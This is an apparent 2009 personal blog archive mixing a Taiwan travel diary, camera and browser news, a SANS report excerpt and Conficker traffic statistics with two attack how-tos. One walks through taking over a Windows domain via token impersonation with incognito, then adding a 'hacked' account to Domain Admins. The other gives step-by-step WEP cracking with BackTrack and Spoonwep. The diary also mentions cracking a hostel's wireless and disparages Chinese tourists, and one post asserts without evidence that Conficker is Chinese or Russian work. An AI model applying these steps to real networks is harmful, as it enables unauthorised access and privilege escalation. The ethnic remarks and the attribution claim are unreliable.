Collapse after went back to hostel last night. Too tired d. Brought some heat rub and vitamin C at Watson nearby, hoho…the Watson here is 5 storey high @_@

Draft itinerary before i forgot :->

Morning

Wake up. Raining outside. tidy out my room (and myself)

Went out at 11am. Decided to go for a movie at Xi men Ting. Finding the IMAX cinema (very deep inside). Brought a combo meal (bad choice $$).

The ticket price is NT 210 alone. With combo meal the price jump up to NT 370. The combo got one large coke, popcorn (suck big time) and a big hotdog.

Walk around the area until near starting time. Go back to counter to collect my meal (with a tray, lol). The cinema attendant shouting at the counter for what movie is going to screen and which door.

I bring my whole tray go inside. Only 4 person in the cinema, lol…Movie start quite on time.

What movie I watch? Neon Genesis Evangelion 2.0 : You Can (Not) Advance.

How about the movie? Best anime movie I watch in my life. You really need big screen to appreciate it. Totally awesome. 11 out of 10 !!! (one mark extra for getting a good subtitle )

After movie, decided to go for shopping at Guan Hua area. Went there. Most of the shop was close due to out of no reason. (It wasn’t a public holiday)

No choice but I walk around the area and checking out the rest of the computer shop. Price wise, not that cheap that I expect At most 10% cheaper than Malaysia. But I can find more variety here.

GF-1, the Lumix Micro 4/3 camera that I dream of is selling at NT 26800 here, which around RM 600-700 cheaper than Malaysia promo price, but the current promotion in Malaysia include an extra original battery and free case…Argh…dilemma. I should save myself from spending like this again.

Spent hours there walking around the area and looking for good stuff. There is a mouse that I always wanted to buy, the Elecom finger tips mouse…NT 1590 here…hmm.

Have some rest and food at Burger King nearby. There wasn’t any chili sauce? Only tomato sauce? Damn. Finish eating, you have to separate your trash and throw them into the proper bin for recycle, hope Malaysia implement this as well, I will love to contribute to earth more XD

Decided to go to 101 Tower after this. Took the train and then a shuttle bus…I in 101 tower d. Public Transport here is really good. Bus is very very frequent here. 101 Shopping complex is like Pavilion KL, only “Branded” stuff there.

Since today weather is good (no raining !!) Going up to the observation tower seem to be a good choice. A NT 400 choice. LOL.

Too bad there is many aunty/uncle from China (smelly one some more) come in tours group. I can see the hopeless look from the Taiwan security guard and attendant. Those aunty/uncle really no manner. I look at the young security guard and we smile at each other after seeing those China ppl try to rush into the lift.

The ratio of Leng Lui in Taiwan is superb. I think is got to do with the fashion sense and the population in Taiwan. Imagine malaysian chinese is same number as taiwan population…hoho…Why I say so? because all the life attendant is really good looking. Even with the mask on !!!

The lift is the fastest in the world. Which is over 1km/min. Taiwan really look alive up there. The light and view is really nice. But what best is the outdoor observation platform. It was really windy and cold there. Best of all, the Japanese gal beside me drop her camera from there. Yes, no kidding, from over 90 storey height…LOL…I help her explain the situation to the security guard but we can’t do anything…of coz la !!!

After coming down to the ground. I went to the Chen Ping Bookstore, the main branch and the largest in Taiwan. Really really nice place. Operate 24/7. Yes, is a 24 hour bookstore, where almost every book you can read inside the bookstore, sitting/standing around the store and no one will scold/question you !!! Really really nice ambient and feel. And I bet it have one of the most complete Chinese book around. I brought another 2 book again One by Chris Anderson, FREE.

Dragging myself back to the hostel. The time is already way past 10pm. Finding a restaurant that still open…until i stumble upon a small Beef noodle store which look nice. The boss is quite young and helpful. Chit chat for awhile and eat the noodle XD. The noodle was so-so but the beef is good. nice texture and the soup is full of beef taste…

Take a bath at hostel. Too tired. Jin is collapse.

Hopefully I didn’t make too loud music at night and disturb my roommate

Basic (draft) Itinerary:

0715 – Depart from Home

0800 – Pick up friend at Puchong (drive back my car)

0830 – Stuck in a stupid jam @ way to LCCT (Truck flip over)

0850 – Check in @ LCCT – Air Asia to Taipei

0910 – Went through the Custom check and notice the flight is full of people (Air Asia X, good job Tony !!)

0940 – Gate finally open (delay 20min?)

1020 – Plane started the engine (and so does the two uncle sitting beside me)

1030 – Lift off with 380++ people. I sitting in the middle row. Is hot and sweaty. And the seat really cramp/small.

1110 – Lunch cart arrived. Got my “special order” BBQ chicken (yum yum~ i haven’t eat breakfast)

1130 – Finish my meal. Quite easy to eat as chicken is boneless and have lot of vege. Quite okay for flight food. Thanks for order for me

1145 – The two uncle beside me talk non-stop even since they sit down. Wanted to play my psp but batt went dead. Try to sleep.

1200 – The two uncle still talk talk talk. Seat is so small so I need to move my shoulder side a bit to avoid touch the uncle (he some more cross his hand !!)

1201 – Still talking. I have no choice but eavesdropping. Hmm, apparently they are quite high rank. Working as sale line i guess?

1230 – Just notice this two uncles is quite update with hi-tech stuff. Wah, talk about PS3 and Plasma TV, and even wanna try install windows 7 starter edition on the company pc.

1245 – They are still talking. So I make my move. I try to join the conversation.

1300 – Some silent now.Haha.

1310 – Now they talk about their kid and how young their kid get their glasses.

1315 – I give up. Stand up and went into the toilet and walk around.

1330 – Just notice toilet got 110v power socket (hair dryer?) Should have charge my psp using this.

1345 – The uncle still talk. I try to jump into conversation with different approach. A little bit of silent.

1400 – Thirsty now, talk too much. Order Oldtown white coffee @ RM6. Bad choice. I just realize drink caffeine stuff dehydrate your body further, It is written in the Air Asia Booklet. Read it when I was drinking the coffee.

1440 – A very rough landing. Still thirsty.

1445 – Get off the plane @ Terminal 2 (just found out Taipei got 2 terminal)

1510 – Done my passport check and walk down the hall to city bus counter.

1515 – Pay TWD 140 for the bus fare – Free Go Express Bus (Airport – Taipei)

1518 – Bus uncle here very helpful. He told me that there is a direct bus to my staying place and ask me to wait for 1530 bus. He even show an old lady a seat to wait for the bus (thumb up)

1540 – Bus come late. Went on the bus, only 10 people on the bus. I guess mostly HK/SG ppl as they speak Cantonese.

1600 – Bus is call Free GO which rhythm in chinese as Flying dog. Hence the bus logo is a dog.

1610 – Passing through the country side. Weather is quite hot (29’C) Road condition is just like Malaysia. Got bump sometime. The countryside feel like Ipoh where houses and temples are build along the hill.

1620 – Saw some really awesome stuff. There is one building is being powered via wind and solar energy. 

1650 – I am the last man on bus. The uncle chit chat with me and drove me direct to the front door of the hostel.

1700 – Check in Hostel. Pay the remaining TWD 1810 (TWD 100 for key deposit)

1720 – Unpack my stuff.Crack the wireless around the hostel (free one hang d ). Hurray, online via my eeePC 701. Speed is like 4Mbps.

1750 – Charge my cloth to Dry fit polo-T and short pant. Check my itinerary today, I should be on plan.

1800 – Updated Facebook message and reply email.

1820 – After finish install all necessary software for my eeePC, say goodbye to my Thai roommate (from Bangkok) who have been here since last week.

1830 – Chit chat with the dorm guardian jie jie (lady boss?) and snap a Polaroid. Roughly ask some direction to Shi Da Night market.

1850 – Manage to reach Xi Men Din Station after asking around. Ppl here quite helpful huh.

1900 – Brought a You You card for TWD 500 (TWD 100 for deposit). Ask the guard after how to go to night market. He also not sure =_=

1905 – Got myself a simple MRT map for reference. Just go la…follow my instinct.

1920 – Guess I very good at this. Reach the Taiwan electric Building station smoothly. I am totally blend into normal Taiwanese life

1940 – Took the wrong turn at the wrong exit. Ask a security guard and pointed my the correct direction.

1945 – Learn my lesson. When I not sure. I asked. Got my way right and I started to see swamp of people.

1950 – Shi Da mean University (of teacher). Lot of leng lui here. Or should I say they are better off with their fashion and make up.

2010 – Walk around the market. The market is within the street which similar to Tick-tack-toe.

2030 – Brought some garlic salted fry chicken (TWD 45), 5 jian pao (TWD 30), 1 Soy jelly (?) with nut and pearl ball (TWD 30) and an fully natural flavour ice cream (TWD 55).

2040 – Saw a stall selling Malaysian curry chicken. And lot of people query for some famous stall. (etc: my jian pao XD)

2100 – Leaving the night market. If it is university area, there must be some good bookstore around. Found one and went in.

2140 – Come over with book in hand (XD). Brought 5 book for TWD 882. That after 20% off…cheap cheap XD.

2145 – Found another second hand bookstore, went in again but didn’t get any book. Book price there is crazy. (TWD 10 per book?)

2220 – Reach back hostel. Meet some new folk in the hostel. Eating my jian pao at kitchen. One singaporean (2nd time in taiwan)treat me some really sweet and tasty fruit. I going to buy some taiwan fruit next time i saw them.

2300 – Bath and chit chat with the dorm guardian.

Now – Just finish typing this entry. Going to sleep now.

The daily trend of Conficker worm.

Day        Date        Total HTTP Hits  Unique IP's  Unique ASN's  Unique GEO's
Monday     2009-10-05      353,374,228    6,177,806        12,578           225
Sunday     2009-10-04      319,116,909    5,848,210        11,625           224
Saturday   2009-10-03      345,899,815    6,115,205        11,740           223
Friday     2009-10-02      324,444,402    5,903,585        12,420           225
Thursday   2009-10-01      311,329,747    6,161,260        12,562           225
Wednesday  2009-09-30      271,927,387    6,370,343        12,584           225
Tuesday    2009-09-29      321,617,133    6,419,746        12,560           224
Monday     2009-09-28      298,942,625    5,784,097        12,335           225
Sunday     2009-09-27      381,931,460    5,893,814        11,595           223
Saturday   2009-09-26      373,511,716    5,991,939        11,656           221
Friday     2009-09-25      420,454,010    6,349,116        12,466           225
Thursday   2009-09-24      359,456,435    6,190,332        12,546           224
Wednesday  2009-09-23      365,905,240    6,344,510        12,490           224
Tuesday    2009-09-22      412,112,235    6,317,103        12,555           224
Monday     2009-09-21      402,866,723    6,228,450        12,480           224
Sunday     2009-09-20      341,461,136    5,718,952        11,621           223
Saturday   2009-09-19      409,631,897    5,960,625        11,714           223
Friday     2009-09-18      395,422,099    6,173,654        12,477           223
Thursday   2009-09-17      429,063,096    6,402,387        12,599           223
Wednesday  2009-09-16      404,947,612    6,239,897        12,599           223
Tuesday    2009-09-15      435,608,525    6,443,852        12,556           223
Monday     2009-09-14      427,108,902    6,420,308        12,530           226
Sunday     2009-09-13      381,846,846    5,769,241        11,617           222
Saturday   2009-09-12      367,351,330    5,958,670        11,706           222
Friday     2009-09-11      217,895,581    5,763,953        12,176           224
Thursday   2009-09-10      323,857,258    6,299,152        12,380           223
Wednesday  2009-09-09      323,932,481    6,346,391        12,525           224
Tuesday    2009-09-08      267,769,518    6,233,405        12,444           223
Monday     2009-09-07      300,297,749    6,140,995        11,948           224
Sunday     2009-09-06      267,938,003    5,647,851        11,182           223

http://www.theregister.co.uk/2009/10/03/conficker_infects_oxford_brookes/

After reading the Deep Analysis of Conficker, we can 99% sure of this worm is crafted by the Chinese/Russian…Only them have the resource and rigid process flow to come up such amazing worm.
We can even sure there is a team of User Experience team that refine the worm and make it more simple to use/attack.

Patch your MS08-067 today?

Who say GF-1 got very limited AF lense?
Update the Zuiko 1442 firmware…and that Oly lense focus way way faster in GF-1 than in the slow EP-1 !!!

Take that, the oly fan !!!

Here the whole list of Lense support by GF-1

http://panasonic.jp/support/global/cs/dsc/connect/g1.html

Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP’s or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Aquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members
————————————–
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:WINDOWSsystem32>net group “domain admins” /domain
net group “domain admins” /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

—————————————————
admin_valsmith Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.

c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found…

Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith

Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c “blackhatadmin_valsmith” cmd

[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:net group “domain admins” hacked /add /domain
net group “domain admins” hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf

After much fiddling, I manage to find the most simple way to do WiFi WEP cracking on Eee PC.

You don’t even need to know linux

No more typing in command on the terminal and memory all the MAC address, channel , etc.

I gonna update this with screenshot later and adding more WEP cracking technique.

How to Install BackTrack 3 Final with Spoonwep in EEE PC

**I have copy all necessary file into the Eee PC laptop, under folder BackTrack.

***Download Link will be update later, stay tune~

1. Ensure you have the Backtrack 3 ISO (bt3final_usb.iso)
2. Ensure you have the spoonwep2.lzm & spoonwpa.lzm file.
3. Run UNetbootin.exe.
4. Select the ISO option and select the Backtrack 3 ISO.
5. Select the USB Drive / SD Card Drive (E:?)
6. Press OK.
7. Once complete, DON’T REBOOT the machine.
8. Open the USB Drive / SD Card Drive, browse to BT3\modules\
9. Copy the spoonwep2.lzm & spoonwpa.lzm into BT3\modules\.
10. Plug the USB Drive / SD Card into EEE PC.
11. Press F2 when power on the machine.
12. Go to the Boot tab and select the HardDisk Drive.
13. Make sure your USB Drive or SD Card is the 1st Harddisk.
14. Save and exit.
15. The EEE PC will boot into Backtrack Linux now.
16. Best select the Backtrack 3 with KDE option.

How to Crack WEP using SpoonWEP2.

1. In case you need login, the Backtrack 3 loginname is root and password is toor.
2. Once the desktop is finish loading, you can now open the Konsole terminal (2nd icon at the taskbar)
3. Once the Terminal window is up, type this

• Spoonwep

4. You will launch the Spoonwep window
5. For EEE PC this is the setting you need to put in:

• Interface     : ath0
• Driver        : Atheros
• Victims        : Unknown Victims

6. You now at the next tab, this is where you discover the AP you want to crack.
7. Press Launch button, then wait for awhile.(~1 min)
8. The Spoonwep will display all AP that use WEP and crackable.
9. Notice the AP display will show the Packet rate and the Wireless transmit power.
10. Select the AP you want the crack (highlight the AP), then press selection OK.
11. If there is client detected (at the bottom of the AP list), you can select it later to try different method of WEP cracking. **We don’t use it now**
12. Leave everything at default, this is the most common method.

• Attack        : ARP attack
• WEP Key        : Unknown
• Attack rate    : 600
• Base MAC    : <AUTO>
• client        : <client-less attack>
• Channel        : <AUTO>

13. What you need to do now is press Launch. Wait a few min and the WEP key will be crack and display in down there

A new firmware version is now announced for Panasonic’s premium manual compact camera, DMC-LX3. Firmware version 2.0 supports several new functions and improves various performance factors to elevate shooting convenience and fun. The firmware also rectifies several minor issues to enhance operation.

The adoption of new algorithms makes it possible to speed up the AF time by approx.20% to 0.50 sec at wide-end.  In addition, a 1:1 aspect ratio recording mode is added as a shooting option in addition to the conventional 4:3, 3:2 and 16:9.

A white balance bracket shot is also now available. The new scene mode High Dynamic is newly incorporated in the scene mode, which helps to capture a scene with moderate exposure even though the scene contains both bright and dark areas together. You can select either of 3 options, Standard, Art, or B/W, depending on the desired effect and personal taste to make the photo look natural to artistic. The white balance adjustment performance is greatly improved especially under fluorescent lights, daytime sunlight and low light.

As well as those mentioned above, the new firmware incorporates attractive advancements for enthusiastic photographers. The exposure compensation range as well as its bracket setting is widened. The fixed composition guidelines are now movable to the intended position with the control of cursor or joystick for free framing. Over exposed parts of the picture are shown not only in the preview but also in playback mode. The lens position of zooming and manual focusing is memorized and will resume at this position.

The photographer’s name can be embedded to the EXIF information of the picture and it can be confirmed via the updated PHOTOfunSTUDIO ver.2.1.

I going to do some in depth cover on Conficker worm.
Have been dealing with Conficker for the past few worm and I think i better document it down

An Analysis of Conficker’s Logic and Rendezvous Points

http://mtc.sri.com/Conficker/

Dun like IE? IE is slow for certain website?

Try this -> http://code.google.com/chrome/chromeframe/

Try use Google Chrome Frame. After install, just change your IE URL from http://www.google.com to cf:http://www.google.com.

You will now enjoy chrome speed in IE !!!

Best use with gmail/facebook and other heavy javascript site.

Here the announcement from Google:

Introducing Google Chrome Frame

Tuesday, September 22, 2009

Today, we’re releasing an early version of Google Chrome Frame, an open source plug-in that brings HTML5 and other open web technologies to Internet Explorer.

We’re building Google Chrome Frame to help web developers deliver faster, richer applications like Google Wave. Recent JavaScript performance improvements and the emergence of HTML5 have enabled web applications to do things that could previously only be done by desktop software. One challenge developers face in using these new technologies is that they are not yet supported by Internet Explorer. Developers can’t afford to ignore IE — most people use some version of IE — so they end up spending lots of time implementing work-arounds or limiting the functionality of their apps.

With Google Chrome Frame, developers can now take advantage of the latest open web technologies, even in Internet Explorer. From a faster Javascript engine, to support for current web technologies like HTML5’s offline capabilities and , to modern CSS/Layout handling, Google Chrome Frame enables these features within IE with no additional coding or testing for different browser versions.

To start using Google Chrome Frame, all developers need to do is to add a single tag:

When Google Chrome Frame detects this tag it switches automatically to using Google Chrome’s speedy WebKit-based rendering engine. It’s that easy. For users, installing Google Chrome Frame will allow them to seamlessly enjoy modern web apps at blazing speeds, through the familiar interface of the version of IE that they are currently using.

We believe that Google Chrome Frame makes life easier for web developers as well as users. While this is still an early version intended for developers, our team invites you to try out this for your site. You can start by reading our documentation. Please share your feedback in our discussion group and file any bugs you find through the Chromium issue tracker.

Seem like there is a fine control on OS level patching cycle/process, the new key point is the third party app.

Web application and client software still remain as a huge entry point. Code review and SDLC education will be critical to all of us

Published: 2009-09-15 by Johannes Ullrich

SANS today released a new Cyber Security Risks report. The report used data from Tippingpoint, Qualys, the Internet Storm Center and input from SANS faculty like Ed Skoudis and Rob Lee.

Some of the key findings include that operating systems are for the large part less and less of a problem. There are few attacks against the operating system itself, and patching has become pretty robust when it comes to the operating system and its core components. However, third party applications (think Adobe, Java, Quicktime) are a big problem, and they are usually not well covered by existing controls.

On the server side, web applications are of course the big entry point for an attacker. In particular the combination of vulnerable web applications and vulnerable client software is frequently used to inject a client exploit into a web application in order to pivot and attack inside the attacked network.

The report includes case studies of actual attacks to underline these points.

For details, see http://www.sans.org/top-cyber-security-risks